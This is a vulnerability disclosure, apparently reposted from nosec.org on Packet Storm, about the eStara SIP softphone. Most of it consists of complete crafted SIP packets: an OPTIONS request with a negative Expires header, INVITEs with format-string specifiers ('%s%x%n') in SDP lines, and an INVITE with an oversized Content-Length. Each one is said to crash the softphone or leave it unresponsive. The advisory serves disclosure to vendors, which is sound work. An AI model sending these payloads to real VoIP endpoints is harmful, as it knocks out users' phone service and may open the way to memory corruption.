eStara SIP softphone is susceptible to denial of service and format string flaws.
934eae5aad07a18778dbf8f0edd5a828561b872570a74187fd7385232de093a9
Visit http://www.nosec.org for more infomation
SIP is the important protocol in VOIP, and I think it'll improve fast and fast in the
future just like the TCP/IP. In that time, we can contact each other by VOIP for vedio and
sound very cheaply.
As a new protocol, most vendor just consider the usable and efficiency but not the
security. Think about the scene : everybody use a SIP phone(not only software but also
hardware) instead of PSTN phone, then our phone be hacked, then we leak accounts. Another
important, if we use a softphone, then our OS be hacked, losing everything... -_-
I have posted some SIP vulnerabilities here before, but it's just beginning, later, more
and more hackers research in it, and more and more vulnerabilities be diged. What I do now
is remind the Vendor to regard this problem.
Ok, look at these vulnerabilities, there are all tested on all version:
1. Processing negative integer in "Expires" item vulnerability:
====================1======================
OPTIONS sip:a@127.0.0.1 SIP/2.0
Via: SIP/2.0/UDP 172.16.3.6:3334;branch=z9hG4bK00001793z9hG4bK.00001FDB
From: 1793 <sip:a@127.0.0.1>;tag=1793
To: zwell <sip:a@127.0.0.1>
Call-ID: 1407@172.16.3.6
CSeq: 5185 OPTIONS
Expires: -127
===========================================
It will be crash.
2. Several vulnerabilitites when processing format string in SDP
====================1======================
INVITE sip:a@127.0.0.1 SIP/2.0
Via: SIP/2.0/UDP 172.16.3.6:3333;branch=z9hG4bK00003013z9hG4bK.00003B37
From: 3013 <sip:a@127.0.0.1>;tag=3013
To: zwell <sip:a@127.0.0.1>
Call-ID: 1295@172.16.3.6
CSeq: 21086 INVITE
Content-Type: application/sdp
Content-Length: 134
v=0
o=3013 3013 3013 %s%x%n IP4 172.16.3.6
s=Session SDP
c=IN IP4 172.16.3.6
t=0 0
m=audio 9876 RTP/AVP 0
a=rtpmap:0 PCMU/8000
===========================================
INVITE sip:a@127.0.0.1 SIP/2.0
Via: SIP/2.0/UDP 172.16.3.6:3333;branch=z9hG4bK00003013z9hG4bK.00003B37
From: 3013 <sip:a@127.0.0.1>;tag=3013
To: zwell <sip:a@127.0.0.1>
Call-ID: 1295@172.16.3.6
CSeq: 21086 INVITE
Content-Type: application/sdp
Content-Length: 134
%s=0
o=4085 4085 4085 IN IP4 172.16.3.6
s=Session SDP
c=IN IP4 172.16.3.6
t=0 0
m=audio 9876 %s%x%n 0
a=rtpmap:0 PCMU/8000
===========================================
It will be have no response.
3. Processing number length in "Content-Length" item vulnerability:
if the length of "Content-Length" more than 9:
===========================================
INVITE sip:a@127.0.0.1 SIP/2.0
Via: SIP/2.0/UDP 172.16.3.6:3333;branch=z9hG4bK00002386z9hG4bK.0000234E
From: 2386 <sip:a@127.0.0.1>;tag=2386
To: zwell <sip:a@127.0.0.1>
Call-ID: 31442@172.16.3.6
CSeq: 4896 INVITE
Content-Type: application/sdp
Content-Length: 1111111111
v=0
o=2386 2386 2386 IN IP4 172.16.3.6
s=Session SDP
c=IN IP4 172.16.3.6
t=0 0
m=audio 9876 RTP/AVP 0
a=rtpmap:0 PCMU/8000
===========================================
It will be crash.
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed